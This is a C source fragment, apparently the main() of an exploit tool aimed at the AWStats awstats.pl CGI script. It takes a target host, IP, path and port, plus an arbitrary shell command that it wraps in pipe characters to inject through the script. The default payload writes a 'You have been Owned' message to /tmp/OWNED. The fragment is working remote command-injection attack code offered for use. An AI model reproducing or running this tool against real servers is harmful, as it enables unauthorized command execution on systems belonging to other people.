int main(int argc, char * argv[]) { extern char *optarg; extern int optind, optopt; int c, Xport = 80, isgood = 0; char *Xhost = "localhost" , *Xip = "127.0.0.1", *Xscript = "awstats.pl", *Xpath = "/cgi-bin"; char exeCmd[1024] = "| echo \"You have been Owned, update AWstat or patch\" > /tmp/OWNED | "; while ((c = getopt(argc, argv, ":uh:i:s:p:c:o:")) != -1) { switch(c) { case 'h': Xhost = optarg; isgood++; break; case 'i': Xip = optarg; isgood++; break; case 's': Xscript = optarg; break; case 'p': Xpath = optarg; break; case 'c': if(strlen(optarg) > 1018) { printf("# `-c` argument can't exceed 1024 bytes (command to long)"); exit(0); } sprintf(exeCmd, " | %s | ", optarg); break; case 'o': Xport = atoi(optarg); break; case 'u': usage(argv[0]); break; case '?': printf("# Unknown option `-%c`\n", optopt); break; } } if( isgood == 1) { printf("# Please specify both host `-h` and ip `-i`\n"); exit(0); } exploit(Xhost, Xpath, Xscript, exeCmd, Xip, Xport); return 0; }